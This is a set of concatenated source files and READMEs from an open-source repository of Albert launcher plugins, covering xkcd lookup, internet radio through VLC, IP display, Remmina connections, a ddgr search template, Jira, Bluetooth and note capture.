[cookiecutter](https://github.com/cookiecutter/cookiecutter) to customise and
bootstrap the repository.
## Example usage
#!sh
# install cookiecutter
pip install cookiecutter
...
# Download this cookiecutter package locally and use it
git clone https://github.com/bergercookie/awesome-albert-plugins
cookiecutter awesome-albert-plugins/cookiecutter
# configure
go through the prompts and adjust accordingly
<file_sep># pulse_control - Albert plugin
## Description
Allows to interact with PulseAudio and do the following:
* Set Input/Output audio device
* Set an Input/Output port
* Set an audio profile
By default, when the plugin is triggered it shows you the active port for each
one of your sources and sinks (i.e., input and output devices respectively) as
well as the active profile for each one of your sound cards.

You can also search for a specific sink/source port or a specific card profile
by adding more characters to your search after the trigger word. Upon selection
of the item, the corresponding source/sink/profile is activated.

## Prerequisites
Install pulseaudio and [pulsectl, its python
wrapper](https://pypi.org/project/pulsectl/). Also install the ``fuzzywuzzy``
python module.
```
pip3 install --user --upgrade pulsectl
```
## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interesting
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep>"""Fetch xkcd comics like a boss."""
from datetime import datetime, timedelta
from pathlib import Path
import json
import subprocess
import sys
import traceback
import albert as v0
from fuzzywuzzy import process
md_name = "Xkcd"
md_description = "Xkcd Comics Fetcher"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/xkcd-albert-plugin"
md_bin_dependencies = ["xkcd-dl"]
md_lib_dependencies = ["fuzzywuzzy"]
icon_path = str(Path(__file__).parent / "image.png")
settings_path = Path(v0.cacheLocation()) / "xkcd"
last_update_path = settings_path / "last_update"
xkcd_dict = Path.home() / ".xkcd_dict.json"
def get_as_item(k: str, v: dict):
return v0.Item(
id=md_name,
icon=[icon_path],
text=v["description"],
subtext=v["date-published"],
completion="",
actions=[
UrlAction("Open in xkcd.com", f"https://www.xkcd.com/{k}"),
ClipAction("Copy URL", f"https://www.xkcd.com/{k}"),
],
)
def update_date_file():
now = (datetime.now() - datetime(1970, 1, 1)).total_seconds()
with open(last_update_path, "w") as f:
f.write(str(now))
def update_xkcd_db():
return subprocess.call(["xkcd-dl", "-u"])
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "xkcd "
def synopsis(self):
return "xkcd title term"
def finalize(self):
pass
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create cache location
settings_path.mkdir(parents=False, exist_ok=True)
if not last_update_path.is_file():
update_date_file()
update_xkcd_db()
def handleQuery(self, query) -> None:
results = []
# check whether I have downloaded the latest metadata
with open(last_update_path, "r") as f:
date_str = float(f.readline().strip())
last_date = datetime.fromtimestamp(date_str)
if datetime.now() - last_date > timedelta(days=1): # run an update daily
update_date_file()
update_xkcd_db()
try:
with open(xkcd_dict, "r", encoding="utf-8") as f:
d = json.load(f)
if len(query.string) in [0, 1]: # Display all items
for k, v in d.items():
results.append(get_as_item(k, v))
else: # fuzzy search
desc_to_item = {item[1]["description"]: item for item in d.items()}
matched = process.extract(
query.string.strip(), list(desc_to_item.keys()), limit=20
)
for m in [elem[0] for elem in matched]:
# bypass a unicode issue - use .get
item = desc_to_item.get(m)
if item:
results.append(get_as_item(*item))
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{sys.exc_info()}",
)
],
),
)
query.add(results)
<file_sep>"""Saxophone - Play internet radio streams from albert."""
import select
import socket
import json
import operator
import random
import traceback
from enum import Enum
from pathlib import Path
from typing import List, Optional
import albert as v0
import subprocess
import gi # isort:skip
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip
md_name = "Saxophone"
md_description = "Play internet radio streams from albert"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//saxophone"
)
md_bin_dependencies = ["vlc"]
icons_path = Path(__file__).parent / "images"
def get_icon(icon: str):
return str(icons_path / icon)
def notify(
app_name: str,
msg: str,
image=None,
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def sort_random(streams):
random.shuffle(streams)
def sort_favorite(streams):
streams.sort(key=operator.attrgetter("favorite"), reverse=True)
icon_path = get_icon("saxophone")
stop_icon_path = get_icon("stop_icon")
repeat_icon_path = get_icon("repeat_icon")
cache_path = Path(v0.cacheLocation()) / "saxophone"
pids_path = cache_path / "streams_on"
data_path = Path(v0.dataLocation()) / "saxophone"
json_config = str(Path(__file__).parent / "config" / "saxophone.json")
sort_fn = sort_random
# sort_fn = sort_favorite
vlc_socket = Path("/tmp/cvlc.unix")
socket_timeout = 0.2
# Classes & supplementary functions -----------------------------------------------------------
class UrlType(Enum):
PLAYLIST = 0
RAW_STREAM = 1
COUNT = 2
INVALID = 3
def issue_cmd(cmd: str) -> str:
if not cmd.endswith("\n"):
cmd += "\n"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.settimeout(socket_timeout)
s.connect(str(vlc_socket))
to_send = str.encode(cmd)
s.sendall(to_send)
# we don't want to block
res = ""
try:
ready = select.select([s], [], [], socket_timeout)
if ready[0]:
while True:
b = s.recv(4096)
if b:
res += b.decode("utf-8")
else:
break
except socket.timeout:
pass
return res
class Stream:
def __init__(self, url: str, name: str, **kargs):
super(Stream, self).__init__()
self.url: str = url
self.name: str = name
self.description: Optional[str] = kargs.get("description")
self.homepage: Optional[str] = kargs.get("homepage")
self._icon: Optional[str] = kargs.get("icon")
self.favorite: bool = kargs.get("favorite", False)
self._url_type: Optional[UrlType] = None
if self.url.endswith(".pls") or self.url.endswith(".m3u"):
self._url_type = UrlType.PLAYLIST
else:
self._url_type = UrlType.RAW_STREAM
def url_type(self) -> Optional[UrlType]: # type: ignore
return self._url_type
def icon(self) -> Optional[str]:
"""Cache the icon."""
if self._icon is None:
return None
return get_icon(self._icon)
streams: List[Stream] = []
def init_streams():
global streams
streams.clear()
with open(json_config) as f:
conts = json.load(f)
for item in conts["all"]:
streams.append(Stream(**item))
sort_fn(streams)
def launch_vlc():
if vlc_socket.exists():
if not vlc_socket.is_socket():
raise RuntimeError(f'Exected socket file "{vlc_socket}" is not a socket')
else:
v0.info("VLC RC Interface is already up.")
else:
# communicate over UNIX socket with vlc
subprocess.Popen(["vlc", "-I", "oldrc", "--rc-unix", vlc_socket])
def is_radio_on() -> bool:
res = issue_cmd("is_playing")
return int(res) == 1
def stop_radio():
"""Turn off the radio."""
res = issue_cmd("stop")
v0.debug(f"Stopping radio,\n{res}")
def start_stream(stream: Stream):
res = issue_cmd(f"add {stream.url}")
v0.debug(f"Starting stream,\n{res}")
# calls ---------------------------------------------------------------------------------------
# initialise all available streams
init_streams()
# launch VLC
launch_vlc()
# supplementary functions ---------------------------------------------------------------------
def get_as_item(stream: Stream):
icon = stream.icon() or icon_path
actions = [FuncAction("Play", lambda stream=stream: start_stream(stream))]
if stream.homepage:
actions.append(UrlAction("Go to radio homepage", stream.homepage))
return v0.Item(
id=f"{md_name}_{stream.name}",
icon=[icon],
text=stream.name,
subtext=stream.description if stream.description else "",
completion="",
actions=actions,
)
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "sax"
def synopsis(self):
return "some radio"
def handleQuery(self, query) -> None: # noqa
results = []
if len(query.string.strip()) <= 1 and is_radio_on():
results.insert(
0,
v0.Item(
id=f"{md_name}_stop",
icon=[stop_icon_path],
text="Stop Radio",
actions=[FuncAction("Stop Radio", lambda: stop_radio())],
),
)
reindex_item = v0.Item(
id=f"{md_name}_repeat",
icon=[repeat_icon_path],
text="Reindex stations",
actions=[FuncAction("Reindex", lambda: init_streams())],
)
try:
query_str = query.string.strip().lower()
if not query_str:
results.append(reindex_item)
for stream in streams:
results.append(get_as_item(stream))
else:
for stream in streams:
if query_str in stream.name.lower() or (
stream.description and query_str.lower() in stream.description.lower()
):
results.append(get_as_item(stream))
# reindex goes at the end of the list if we are searching for a stream
results.append(reindex_item)
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, data_path, pids_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
issue_cmd("logout")
<file_sep>"""IPs of the host machine."""
from typing import Dict
import traceback
from pathlib import Path
import netifaces
from urllib import request
from fuzzywuzzy import process
from albert import *
md_iid = "0.5"
md_version = "0.2"
md_name = "IPs of the host machine"
md_description = "Shows machine IPs"
md_license = "BSD-2"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//ipshow"
md_maintainers = "<NAME>"
md_lib_dependencies = ["fuzzywuzzy"]
icon_path = str(Path(__file__).parent / "ipshow")
cache_path = Path(cacheLocation()) / "ipshow"
config_path = Path(configLocation()) / "ipshow"
data_path = Path(dataLocation()) / "ipshow"
# flags to tweak ------------------------------------------------------------------------------
show_ipv4_only = True
discard_bridge_ifaces = True
families = netifaces.address_families
def filter_actions_by_query(items, query, score_cutoff=20):
sorted_results_text = process.extractBests(
query, [x.text for x in items], score_cutoff=score_cutoff
)
sorted_results_subtext = process.extractBests(
query, [x.subtext for x in items], score_cutoff=score_cutoff
)
results_arr = [(x, score_cutoff) for x in items]
for text_res, score in sorted_results_text:
for i in range(len(items)):
if items[i].text == text_res and results_arr[i][1] < score:
results_arr[i] = (items[i], score)
for subtext_res, score in sorted_results_subtext:
for i in range(len(items)):
if items[i].subtext == subtext_res and results_arr[i][1] < score:
results_arr[i] = (items[i], score)
return [x[0] for x in results_arr if x[1] > score_cutoff or len(query.strip()) == 0]
class ClipAction(Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: setClipboardText(copy_text))
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def defaultTrigger(self):
return "ip "
def handleQuery(self, query):
results = []
if not query.isValid:
return
try:
# External IP address -------------------------------------------------------------
try:
with request.urlopen("https://ipecho.net/plain", timeout=1.5) as response:
external_ip = response.read().decode()
except:
external_ip = "Timeout fetching public IP"
results.append(
self.get_as_item(
text=external_ip,
subtext="External IP Address",
actions=[
ClipAction("Copy address", external_ip),
],
)
)
# IP address in all interfaces - by default IPv4 ----------------------------------
ifaces = netifaces.interfaces()
# for each interface --------------------------------------------------------------
for iface in ifaces:
addrs = netifaces.ifaddresses(iface)
for family_to_addrs in addrs.items():
family = families[family_to_addrs[0]]
# discard all but IPv4?
if show_ipv4_only and family != "AF_INET":
continue
# discard bridge interfaces?
if discard_bridge_ifaces and iface.startswith("br-"):
continue
# for all addresses in this interface -------------------------------------
for i, addr_dict in enumerate(family_to_addrs[1]):
own_addr = addr_dict["addr"]
broadcast = addr_dict.get("broadcast")
netmask = addr_dict.get("netmask")
results.append(
self.get_as_item(
text=own_addr,
subtext=iface.ljust(15)
+ f" | {family} | Broadcast: {broadcast} | Netmask: {netmask}",
actions=[
ClipAction("Copy address", own_addr),
ClipAction("Copy interface", iface),
],
)
)
# Gateways ------------------------------------------------------------------------
# Default gateway
def_gws: Dict[int, tuple] = netifaces.gateways()["default"]
for def_gw in def_gws.items():
family_int = def_gw[0]
addr = def_gw[1][0]
iface = def_gw[1][1]
results.append(
self.get_as_item(
text=f"[GW - {iface}] {addr}",
subtext=families[family_int],
actions=[
ClipAction("Copy address", addr),
ClipAction("Copy interface", iface),
],
)
)
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
Item(
id=self.name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(filter_actions_by_query(results, query.string, 20))
def get_as_item(self, text, subtext, actions=[]):
return Item(
id=self.name(),
icon=[icon_path],
text=text,
subtext=subtext,
completion=self.defaultTrigger() + text,
actions=actions,
)
# supplementary functions ---------------------------------------------------------------------
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
<file_sep># isort ------------------------------------------------------------------------
[tool.isort]
include_trailing_comma = true
line_length = 95
multi_line_output = 3
profile = "black"
# black ------------------------------------------------------------------------
[tool.black]
preview = true
line-length = 95
target-version = ['py38', 'py39']
include = '\.pyi?$'
# mypy -------------------------------------------------------------------------
[tool.mypy]
warn_return_any = true
warn_unused_configs = true
[[tool.mypy.overrides]]
module = [
"tqdm",
"pytest",
"pexpect",
"notion_client",
"taskw",
"taskw.warrior",
"google.auth.transport.requests",
"google_auth_oauthlib.flow",
]
ignore_missing_imports = true
# pylint -----------------------------------------------------------------------
[tool.pylint]
[tool.pylint.master]
persistent = "yes"
suggestion-mode = "yes"
unsafe-load-any-extension = "no"
ignore = "VCS"
[tool.pylint.messages_control]
disable = "C0330,C0326,C0103,W0613,R0201,R1720,R1705,W0104,C0301"
[tool.pylint.refactoring]
max-nested-blocks = 5
never-returning-functions = "sys.exit,argparse.parse_error"
[tool.pylint.similarities]
ignore-comments = "yes"
ignore-docstrings = "no"
ignore-imports = "yes"
# ignore-signatures=no
min-similarity-lines = 4
[tool.pylint.format]
max-line-length = 95
ignore-invalid-name = true
max-module-lines = 500
[tool.pylint.string]
check-quote-consistency = "yes"
# pyright ----------------------------------------------------------------------
[tool.pyright]
reportMissingImports = true
reportMissingTypeStubs = false
pythonVersion = "3.8"
pythonPlatform = "Linux"
# coverage.py ------------------------------------------------------------------
[tool.coverage]
[tool.coverage.run]
omit = [
"quickstart.py",
"quickstart_gkeep.py",
"a.py",
"*/.pdbrc.py",
"tests/*",
]
# pytest -----------------------------------------------------------------------
[tool.pytest.ini_options]
addopts = ["--ignore-glob=quickstart*", "--doctest-modules"]
# ruff -------------------------------------------------------------------------
[tool.ruff]
line-length = 95
target-version = "py38"
# vim: tw=80
<file_sep># jira - Albert plugin
<a href="https://www.codacy.com/manual/bergercookie/jira-albert-plugin">
<img src="https://api.codacy.com/project/badge/Grade/02097c818d9b43ecb35badfb0e4befd7"/></a>
<a href=https://github.com/bergercookie/jira-albert-plugin/blob/master/LICENSE" alt="LICENCE">
<img src="https://img.shields.io/github/license/bergercookie/jira-albert-plugin.svg" /></a>
<a href="https://github.com/psf/black">
<img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg"></a>
<a href=" https://github.com/bergercookie/jira-albert-plugin/issues">
<img src="https://img.shields.io/github/issues/bergercookie/jira-albert-plugin/jira.svg"></a>
## Demo
| | |
|:-------------------------:|:-------------------------:|
|<img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-setup0.png"> | <img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-setup1.png"> |
<img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-setup2.png"> | <img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-basic.png"> Basic usage |
<img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-fuzzy-search-title.png"> Fuzzy search | <img src="https://raw.githubusercontent.com/bergercookie/jira-albert-plugin/master/misc/demo-options.png"> Options for issue |
## Description
`jira-albert-plugin` allows you to interact with your jira server via the albert
launcher.
On first run, you'll be guided through a series of setup steps:
- user to use, e.g., <EMAIL>
- server to connect to e.g., https://an-example-jira-server.atlassian.net
You also have to create an API key: https://id.atlassian.com/manage/api-tokens
- To make sure the API key is stored safely, the plugin expects to find it
gpg-encrypted using your default gpg-id under the following path:
```
~/.password-store/jira-albert-plugin/api-key.gpg
```
You can do that either manually `gpg --encrypt... -o ...` or consider using
[Pass](https://www.passwordstore.org/), the UNIX password manager.
After having setup the plugin, on trigger the plugin will fetch all the issues
assigned to the current user. You also get an option of creating a new issue
from scratch.
By pressing on one of the issues you'll be redirected to the its jira page. On
`[ALT]` you have options to copy the jira URL, or to transition it, e.g.,
`Backlog` -> `In Progress` or `Select From Development` -> `Done`.
Issues are sorted and are colored according to their priority
You can narrow down the search to the most relevant items by typing additional
letters/words. The plugin uses fuzzy search to find the most relevant issues to
show.
Additional information:
* To reset/use a different account, delete the config location (by default
`~/.config/albert/jira`) and substitute the gpg-encrypted api-key.
## Motivation
Navigating to JIRA, searching for your ticket of choice and changing its status
via the web interface is cumbersome. This plugin lets you do that far more
easily and in addition, without leaving the keyboard for a second.
## Manual installation instructions
Requirements:
- Albert - [Installation instructions](https://albertlauncher.github.io/docs/installing/)
- Albert Python Interface: ``v0.4``
- Python version >= 3.5
## Self Promotion
If you find this tool useful, please [star it on
Github](https://github.com/bergercookie/jira-albert-plugin)
## TODO List
See [ISSUES list](https://github.com/bergercookie/jira-albert-plugin/issues) for the things
that I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>#!/usr/bin/env bash
set -ex
ROOT=`dirname ${BASH_SOURCE[0]}`/..
ls -lart .
ls -lart $ROOT
ls -lart $ROOT/plugins
(
cd $ROOT
"$ROOT"/create_ddgr_plugins.py
)
test -d "$ROOT/plugins/search_wikipedia"
test -d "$ROOT/plugins/search_amazon"
<file_sep>"""Lookup and Start Remmina Connections."""
import configparser
import os
import subprocess
from glob import glob
from pathlib import Path
from re import IGNORECASE, search
from typing import Tuple, Sequence
from albert import *
md_iid = "0.5"
md_version = "0.2"
md_name = "Remmina"
md_description = "Start a Remmina VNC/SFTP connection"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/remmina"
md_maintainers = "<NAME>, <NAME>"
md_bin_dependencies = ["remmina"]
md_lib_dependencies = ["configparser"]
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "rem"
def synopsis(self):
return "<connection name>"
def initialize(self):
self.module_path = Path(__file__).absolute().parent
self.icon_path = self.module_path / "icons" / "remmina.svg"
self.connections_path = Path(os.environ["HOME"]) / ".local" / "share" / "remmina"
def get_protocol_icon_path(self, proto: str) -> Path:
path = self.module_path / "icons" / f"remmina-{proto.lower()}-symbolic.svg"
if path.is_file():
return path
else:
return self.icon_path
def getConfigFiles(self) -> Sequence[str]:
return [f for f in glob(str(self.connections_path) + "**/*.remmina", recursive=True)]
def getAsItem(self, name, group, server, proto, file):
return Item(
id=name,
icon=[str(self.get_protocol_icon_path(proto))],
text=(name, "%s/ %s" % (group, name))[len(group) > 0],
subtext="%s %s" % (proto, server),
actions=[Action("open", "Open connection", lambda cf=file: runRemmina(cf))],
)
def handleQuery(self, query):
files = self.getConfigFiles()
all_connections = [getConnectionProperties(f) for f in files]
stripped = query.string.strip()
results = []
if stripped: # specific query by the user
for p in all_connections:
# search in names and groups
if search(stripped, p[0], IGNORECASE) or search(stripped, p[1], IGNORECASE):
results.append(self.getAsItem(*p))
else: # nothing specified yet, show all possible connections
for p in all_connections:
results.append(self.getAsItem(*p))
# add it at the very end - fallback choice in case none of the connections is what the
# user wants
results.append(
Item(
id=md_name,
icon=[str(self.icon_path)],
text=md_name,
subtext=__doc__,
actions=[Action("open", "Open Remmina", runRemmina)],
)
)
query.add(results)
def runRemmina(cf: str = "") -> None:
args = (["remmina"], ["remmina", "-c", cf])[len(cf) > 0]
subprocess.Popen(args)
def getConnectionProperties(f: str) -> Tuple[str, str, str, str, str]:
assert os.path.isfile(f), f"No such file -> {f}"
conf = configparser.ConfigParser()
conf.read(f)
name = conf["remmina"]["name"]
group = conf["remmina"]["group"]
server = conf["remmina"]["server"]
proto = conf["remmina"]["protocol"]
return name, group, server, proto, f
<file_sep># bluetooth - Albert plugin
## Demo
https://raw.githubusercontent.com/bergercookie/awesome-albert-plugins/master/plugins/bluetooth/misc/demo.mp4


## Description
This is a small plugin that allows for:
* Connecting/disconnecting a device
* Pairing and trusting a device
* Enabling/disabling bluetooth altogether
## Installation instructions
Make sure you have `rfkill` and `bluetoothctl` installed and available in your
`$PATH`
## Self Promotion
If you find this tool useful, please [star it on
Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interesting
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep># Scratchpad - Albert plugin
## Demo


## Description
Capture all of your thoughts and one-line notes to a single text file.
Use `s ` to trigger the plugin, add whatever text you want and on ENTER albert
will save it to a designated textfile.
This way you can capture all your thoughts to a file and then decide whether you
want to spend the time to further organise these better / split them to multiple
files, etc.
## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interesting
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep>"""
Current file was autogeneratd by the search_template and the `create_ddgr_plugins.py`
script. In case you find a bug please submit a patch to the aforementioned directories and file
instead.
"""
"""{{ cookiecutter.plugin_short_description }}."""
import json
import shutil
import subprocess
import traceback
from io import StringIO
from pathlib import Path
from typing import Dict, Sequence, Tuple
import albert as v0
md_iid = "0.5"
md_version = "0.2"
md_name = "Search - {{ cookiecutter.plugin_name }}"
md_description = "{{ cookiecutter.plugin_short_description }}"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins"
md_bin_dependencies = ["ddgr"]
md_lib_dependencies = []
icon_path = str(Path(__file__).parent / "{{ cookiecutter.plugin_name }}")
cache_path = Path(v0.cacheLocation()) / "{{ cookiecutter.plugin_name }}"
config_path = Path(v0.configLocation()) / "{{ cookiecutter.plugin_name }}"
data_path = Path(v0.dataLocation()) / "{{ cookiecutter.plugin_name }}"
# set it to the corresponding site for the search at hand
# e.g.,: https://github.com/jarun/googler/blob/master/auto-completion/googler_at/googler_at
ddgr_at = "{{ cookiecutter.ddgr_at }}"
# special way to handle the url? --------------------------------------------------------------
url_handler = "{{ cookiecutter.url_handler }}"
url_handler_check_cmd = "{{ cookiecutter.url_handler_check_cmd }}"
if url_handler_check_cmd:
p = subprocess.Popen(url_handler_check_cmd, shell=True)
p.communicate()
if p.returncode != 0:
print(
f'[W] Disabling the url handler "{url_handler}"... - Condition'
f" {url_handler_check_cmd} not met"
)
url_handler = None
url_handler_desc = "{{ cookiecutter.url_handler_description }}"
if not url_handler_desc:
url_handler_desc = "Run special action"
# browser -------------------------------------------------------------------------------------
# look for google-chrome first
inco_browser = shutil.which("google-chrome")
if not inco_browser:
inco_browser = shutil.which("chromium-browser")
if inco_browser:
inco_cmd = lambda url: subprocess.Popen([inco_browser, "--incognito", url])
else:
inco_cmd = None
# supplementary functions ---------------------------------------------------------------------
def query_ddgr(query_str) -> Tuple[Sequence[Dict[str, str]], str]:
"""Make a query to ddgr and return the results in json."""
li = ["ddgr", "--noprompt", "--unsafe", "--json", query_str]
if ddgr_at:
li = li[:2] + ["-w", ddgr_at] + li[2:]
p = subprocess.Popen(li, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if stdout:
json_ret = json.load(StringIO(stdout.decode("utf-8")))
else:
json_ret = [dict()]
stderr = stderr.decode("utf-8")
return json_ret, stderr
def get_ddgr_result_as_item(ddgr_item: dict):
actions = [
UrlAction("Open in browser", ddgr_item["url"]),
ClipAction("Copy URL", ddgr_item["url"]),
]
# incognito search
if inco_cmd:
actions.insert(
1,
FuncAction(
"Open in browser [incognito mode]",
lambda url=ddgr_item["url"]: inco_cmd(url), # type: ignore
),
)
# special url handler
if url_handler:
# check that the handler is actually there
actions.insert(
0,
FuncAction(
url_handler_desc,
lambda url_handler=url_handler: subprocess.Popen(
f'{url_handler} {ddgr_item["url"]}', shell=True
),
),
)
return v0.Item(
id=md_name,
icon=[icon_path],
text=ddgr_item["title"],
subtext=ddgr_item["abstract"],
actions=actions,
)
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def setup(query) -> bool:
"""setup is successful if an empty list is returned.
Use this function if you need the user to provide you data
"""
results = []
if not shutil.which("ddgr"):
results.append(
v0.Item(
id=md_name,
icon=icon_path,
text='"ddgr" is not installed.',
subtext='Please install and configure "ddgr" accordingly.',
actions=[
UrlAction(
'Open "ddgr" installation instructions',
"https://github.com/jarun/ddgr#installation=",
)
],
)
)
query.add(results)
return True
return False
# helpers for backwards compatibility ---------------------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name: str, copy_text: str):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name: str, command):
super().__init__(name, name, command)
# main plugin class ---------------------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "{{ cookiecutter.trigger }} "
def synopsis(self):
return "query text."
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
results = []
try:
# setup stage ---------------------------------------------------------------------
did_setup = setup(query)
if did_setup:
return
query_str = query.string.strip()
# too small request - don't even send it.
if len(query_str) < 2:
return
# determine if we can make the request --------------------------------------------
if not query_str.endswith("."):
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="typing...",
subtext='Add a dot to the end of the query "." to trigger the search',
actions=[],
),
)
return
query_str = query_str[:-1].strip()
# proceed, fill the results then query.add that only at the end -------------------
# send request
json_results, stderr = query_ddgr(query_str)
ddgr_results = [
get_ddgr_result_as_item(ddgr_result) for ddgr_result in json_results
]
results.extend(ddgr_results)
if not results:
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="No results.",
subtext=stderr if stderr else "",
actions=[],
),
)
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep>"""User-defined abbreviations read/written a file."""
import hashlib
import traceback
from pathlib import Path
from typing import Dict, Tuple
import gi
from fuzzywuzzy import process
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip
import albert as v0
md_name = "User-defined abbreviations read/written a file"
md_description = "TODO"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/abbr"
icon_path = str(Path(__file__).parent / "abbr")
cache_path = Path(v0.cacheLocation()) / "abbr"
config_path = Path(v0.configLocation()) / "abbr"
data_path = Path(v0.dataLocation()) / "abbr"
abbr_store_fname = config_path / "fname"
abbr_store_sep = config_path / "separator"
abbreviations_path = Path()
abbr_latest_hash = ""
abbr_latest_d: Dict[str, str] = {}
abbr_latest_d_bi: Dict[str, str] = {}
split_at = ":"
